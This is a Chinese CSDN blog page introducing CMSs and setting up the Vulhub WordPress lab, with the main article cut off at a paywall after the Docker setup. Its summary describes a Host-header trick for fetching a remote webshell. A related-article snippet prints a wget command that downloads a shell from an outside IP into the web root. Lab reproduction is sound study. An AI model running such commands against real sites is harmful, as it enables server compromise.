简单了解cms,复现vulhub中的wordpress漏洞

最新推荐文章于 2024-07-11 08:39:22 发布
最新推荐文章于 2024-07-11 08:39:22 发布
阅读量1k 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64655821/article/details/126815314
版权
本文介绍了如何复现vulhub中的WordPress漏洞,特别是利用CMS系统的特性写入webshell。通过修改host字段,绕过防御机制,最终尝试通过curl或wget下载并执行远程的一句话木马文件。
摘要由CSDN通过智能技术生成

我们认为内容管理系统是一种位于WEB前端(Web 服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容管理解决方案重点解决各种非结构化或半结构化的数字资源的采集、管理、利用、传递和增值,并能有机集成到结构化数据的商业智能环境中,如OA,CRM等。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的"内容"可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到 Internet、Intranet以及Extranet网站的信息。

CMS具有许多基于模板的优秀设计,可以加快网站开发的速度和减少开发的成本。

CMS的功能并不只限于文本处理,它也可以处理图片、Flash动画、声像流、图像甚至电子邮件档案。

CMS还分各个平台脚本种类的。

复现vulhub中的wordpress漏洞

前提:

Dockers compose已安装

搭建好vulhub

靶机:centos7192.168.102.134

攻击机:192.168.100.205

模式nat模式可以ping通

开启docker

Systemctl start docker

开启

Setenforce 0

查看状态

Systemctl status docker

进入/root/vulhub-master/vulhub-master/wordpress/pwnscriptum目录下

运行容器

docker-compose up -d

启动容器发现起不动,然后

停止mysqld和防火墙,再重启docker,后台开启docker-compose

最低0.47元/天 解锁文章
晓目
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)
qq_51577576的博客
02-21 1557
[ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。Drupal在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞
帝国cms漏洞CMS7.5漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 2064
一.帝国cms漏洞简介 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 [帝国cms漏洞影响版本]
vulhubWordpress 4.6 任意命令执行漏洞复现
yougexiaojiuguan的博客
03-04 847
漏洞复现的记录
CMS漏洞复现
x594238758的博客
09-10 3808
CMS是英语Content Management System的缩写,按英语的字面翻译就是内容管理系统,顾名思义,它主要是为了方便发布网络内容而存在的一体化Web管理系统。很久很久以前,人们做网站很多用静态HTML+CSS+Javascript直接写,也就是静态页面。
漏洞复现WordPress——Recall——SQL注入(CVE-2024-32709)
最新发布
LongL_GuYu的博客
07-11 845
Plechev Andrey WP-Recall存在SQL注入漏洞。该漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞在SQL命令不恰当地立化特殊元素,造成数据库被恶意操作的风险。
CMS漏洞wordpress01
zh的博客
10-15 858
靶场地址:http://whalwl.site:8041/ 解题准备:准备POC 解题思路: 1、抓包,准备修改数据包 执行命令,远程下载一个shell,到靶场网站根目录。 /usr/bin/wget --output-document /var/www/html/999.php 167.160.xxx.217/999.txt 2、具体请求包: POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -fr...
vulhub漏洞复现1
xhscxj的博客
05-23 1951
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
vulhub漏洞复现74_Wordpress
weixin_44193247的博客
02-13 1268
vulhub漏洞复现练习篇
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 952
vulhub漏洞复现练习篇
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 779
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
wp-plugin-vulnerabilities:WordPress插件漏洞的集合
05-16
wp-plugin漏洞 WordPress插件漏洞的标准化集合。 用于此目的的数据已从WordPress.org存储库的“”插件提取,并以标准的YAML格式存储。 这些开发人员已为此YAML提供了所有原始源数据,我们所做的只是从PHP源代码提取数据并将其存储在YAML。 YAML结构的密钥是WordPress.org插件的子标签,可用于使用插件的目录名称轻松地识别已安装的插件(不幸的是,由于WordPress.org插件的性质,这种方法并不总是可靠的)。 我们将尽一切努力使它保持最新状态并与插件版本保持一致。 标签是从插件导入数据的日期,并查看它是“最新”的,将其与该插件的“最新更新”日期发布进行比较。 我想与原始开发人员合作,为此创建一个标准的数据存储,所以我还是朝着前进的方向迈进了-这毕竟是开源项目的目的。 为了帮助这个项目,请随时发出拉取请求等,我将在适当的时候考虑
Wordpress漏洞复现
weixin_52194536的博客
09-10 9046
cms漏洞
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5410
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.php,wordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
vulnhubVulnCMS: 1
qwweggfe的博客
08-06 676
VulnCMS: 1 首先进行ip扫描 看看开启了哪些端口 对端口进行扫描 nmap -sC -sV -p 22,5000,80,8081,9001 192.168.181.146 --min-rate=2000 在端口协议上进行扫描发现三个 WordPress 5.7.2 Joomla drupal,于是在msf上进行查看 我尝试了第八个,可是不行 于是我来测试最后一个 search dr...
wordpress 漏洞_轻松发现WordPress漏洞
culi4814的博客
08-24 1万+
wordpress 漏洞As a developer or design professional, one of the biggest benefits of building your sites on WordPress is that in most cases you are building your code on a proven platform which has been ...
CVE-2017-5489 WordPress漏洞
qq_33440662的博客
11-23 528
看我如何挖掘到WordPress漏洞并最终拿下$1337的赏金
WordPress plugin 代码注入漏洞(CVE-2022-24663)
千寻的博客
12-09 2443
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求,并在站点上执行任意 PHP 代码。 存在常见用户名低权限用户弱口令
wordpresscms漏洞
10-04
WordPress CMS漏洞是指WordPress这个内容管理系统存在的安全漏洞。虽然WP 3.0版本之后修复了一些已知的安全问题,但仍然可能存在新的漏洞。由于WordPress是一款非常流行的CMS系统,因此黑客们一直在寻找并利用其的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值